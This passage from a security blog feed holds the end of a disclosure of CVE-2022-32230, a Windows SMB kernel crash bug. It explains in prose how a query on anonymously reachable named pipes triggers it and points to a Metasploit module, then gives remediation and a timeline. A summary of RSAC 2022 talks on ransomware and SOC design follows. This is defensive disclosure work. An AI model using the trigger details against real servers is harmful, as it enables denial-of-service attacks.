For FileNormalizedNameInformation information class requests, if not supported by the server implementation<392>, or if Connection.Dialect is "2.0.2", "2.1" or "3.0.2", the server MUST fail the request with STATUS_NOT_SUPPORTED.

To trigger this code path, a user would open any named pipe from the IPC$ share and make a QUERY_INFO request for the FILE_NORMALIZED_NAME_INFORMATION class. This typically requires user permissions or a non-default configuration enabling guest access. This is not the case, however, for the noteworthy exception of domain controllers where there are multiple named pipes that can be opened anonymously, such as netlogon. An alternative named pipe that can be used but does typically require permissions is the srvsvc pipe.

Under normal circumstances, the FILE_NORMALIZED_NAME_INFORMATION class would be used to query the normalized name information of a file that exists on disk. This differs from the exploitation scenario which queries a named pipe.

A system that has applied the patch for this vulnerability will respond to the request with the error STATUS_NOT_SUPPORTED.

Proof of concept

A proof-of-concept Metasploit module is available on GitHub. It requires Metasploit version 6.2 or later.

Impact

The most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition. Given the current state of the art of exploitation, it is assumed that a null pointer dereference in the Windows kernel is not remotely exploitable for the purpose of arbitrary code execution without combining it with another, unrelated vulnerability.

In the default configuration, Windows will automatically restart after a BSOD.

Remediation

It is recommended that system administrators apply the official patches provided by Microsoft in their April 2022 update. If that is not possible, restricting access and disabling SMB version 3 can help remediate this flaw.

Disclosure timeline

April 12th, 2022 – Microsoft patches CVE-2022-32230
April 29th, 2022 – Rapid7 finds and confirms the vulnerability while investigating CVE-2022-24500
May 4th, 2022 – Rapid7 contacts MSRC to clarify confusion regarding CVE-2022-32230
May 18th, 2022 – Microsoft responds to Rapid7, confirming that the vulnerability now identified as CVE-2022-32230 is different from the disclosed vulnerability CVE-2022-24500 with which it was patched
June 1, 2022 — Rapid7 reserves CVE-2022-32230 after discussing with Microsoft
June 14th, 2022 – Rapid7 releases details in this disclosure, and Microsoft publishes its advisory

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Defending Against Tomorrow’s Threats: Insights From RSAC 2022

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/06/13/defending-against-tomorrows-threats-insights-from-rsac-2022/

Defending Against Tomorrow's Threats: Insights From RSAC 2022

The rapidly changing pace of the cyberthreat landscape is on every security pro’s mind. Not only do organizations need to secure complex cloud environments, they’re also more aware than ever that their software supply chains and open-source elements of their application codebase might not be as ironclad as they thought.

It should come as no surprise, then, that defending against a new slate of emerging threats was a major theme at RSAC 2022. Here’s a closer look at what some Rapid7 experts who presented at this year’s RSA conference in San Francisco had to say about staying ahead of attackers in the months to come.

Surveying the threat landscape

Security practitioners often turn to Twitter for the latest news and insights from peers. As Raj Samani, SVP and Chief Data Scientist, and Lead Security Researcher Spencer McIntyre pointed out in their RSA talk, “Into the Wild: Exploring Today’s Top Threats,” the trend holds true when it comes to emerging threats.

“For many people, identifying threats is actually done through somebody that I follow on Twitter posting details about a particular vulnerability,” said Raj.

As Spencer noted, security teams need to be able to filter all these inputs and identify the actual priorities that require immediate patching and remediation. And that’s where the difficulty comes in.

“How do you manage a patching strategy when there are critical vulnerabilities coming out … it seems weekly?” Raj asked. “Criminals are exploiting these vulnerabilities literally in days, if that,” he continued.

Indeed, the average time to exploit — i.e., the interval between a vulnerability being discovered by researchers and clear evidence of attackers using it in the wild — plummeted from 42 days in 2020 to 17 days in 2021, as noted in Rapid7’s latest Vulnerability Intelligence Report. With so many threats emerging at a rapid clip and so little time to react, defenders need the tools and expertise to understand which vulnerabilities to prioritize and how attackers are exploiting them.

“Unless we get a degree of context and an understanding of what’s happening, we’re going to end up ignoring many of these vulnerabilities because we’ve just got other things to worry about,” said Raj.

The evolving threat of ransomware

One of the things that worry security analysts, of course, is ransomware — and as the threat has grown in size and scope, the ransomware market itself has changed. Cybercriminals are leveraging this attack vector in new ways, and defenders need to adapt their strategies accordingly.

That was the theme that Erick Galinkin, Principal AI Researcher, covered in his RSA talk, “How to Pivot Fast and Defend Against Ransomware.” Erick identified four emerging ransomware trends that defenders need to be aware of:

  • Double extortion: In this type of attack, threat actors not only demand a ransom for the data they’ve stolen and encrypted but also extort organizations for a second time — pay an additional fee, or they’ll leak the data. This means that even if you have backups of your data, you’re still at risk from this secondary ransomware tactic.
  • Ransomware as a service (RaaS): Not all threat actors know how to write highly effective ransomware. With RaaS, they can simply purchase malicious software from a provider, who takes a cut of the payout. The result is a broader and more decentralized network of ransomware attackers.
  • Access brokers: A kind of mirror image to RaaS, access brokers give a leg up to bad actors who want to run ransomware on an organization’s systems but need an initial point of entry. Now, that access is for sale in the form of phished credentials, cracked passwords, or leaked data.
  • Lateral movement: Once a ransomware attacker has infiltrated an organization’s network, they can use lateral movement techniques to gain a higher level of access and ransom the most sensitive, high-value data they can find.

With the ransomware threat growing by the day and attackers’ techniques growing more sophisticated, security pros need to adapt to the new landscape. Here are a few of the strategies Erick recommended for defending against these new ransomware tactics.

  • Continue to back up all your data, and protect the most sensitive data with strong admin controls.
  • Don’t get complacent about credential theft — the spoils of a might-be phishing attack could be sold by an access broker as an entry point for ransomware.
  • Implement the principle of least privilege, so only administrator accounts can perform administrator functions — this will help make lateral movement easier to detect.

Shaping a new kind of SOC

With so much changing in the threat landscape, how should the security operations center (SOC) respond?

This was the focus of “Future Proofing the SOC: A CISO’s Perspective,” the RSA talk from Jeffrey Gardner, Practice Advisor for Detection and Response (D&R). In addition to the sprawling attack surface, security analysts are also experiencing a high degree of burnout, understandably overwhelmed by the sheer volume of alerts and threats. To alleviate some of the pressure, SOC teams need a few key things:

For Jeffrey, these needs are best met through a hybrid SOC model — one that combines internally owned SOC resources and staff with external capabilities offered through a provider, for a best-of-both-worlds approach. The framework for this approach is already in place, but the version that Jeffrey and others at Rapid7 envision involves some shifting of paradigms. These include:

  • Collapsing the distinction between product and service and moving toward “everything as a service,” with a unified platform that allows resources — which includes everything from in-product features to provider expertise and guidance — to be delivered at a sliding scale
  • Ensuring full transparency, so the organization understands not only what’s going on in their own SOC but also in their provider’s, through the use of shared solutions
  • More customization, with workflows, escalations, and deliverables tailored to the customer’s needs

Meeting the moment

It’s critical to stay up to date with the most current vulnerabilities we’re seeing and the ways attackers are exploiting them — but to be truly valuable, those insights must translate into action. Defenders need strategies tailored to the realities of today’s threat landscape.

For our RSA 2022 presenters, that might mean going back to basics with consistent data backups and strong admin controls. Or it might mean going bold by fully reimagining the modern SOC. The techniques don’t have to be new or fancy or to be effective — they simply have to meet the moment. (Although if the right tactics turn out to be big and game-changing, we’ll be as excited as the next security pro.)

Looking for more insights on how defenders can protect their organizations amid today’s highly dynamic threat landscape? You can watch these presentations — and even more from our Rapid7 speakers — at our library of replays from RSAC 2022.

Additional reading

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.